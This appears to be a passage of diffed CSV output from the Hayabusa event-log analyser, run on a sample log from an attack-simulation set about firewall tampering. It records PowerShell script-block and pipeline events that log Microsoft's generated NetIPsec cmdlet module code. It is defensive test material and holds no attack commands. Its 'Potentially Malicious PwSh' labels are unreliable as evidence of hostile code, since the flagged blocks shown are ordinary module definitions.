$__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.177 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.178 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.178 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.178 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.179 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.183 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.185 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.185 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.186 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.226 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.226 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.227 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.228 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.228 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.229 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.229 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.233 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.276 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.276 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"yDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains 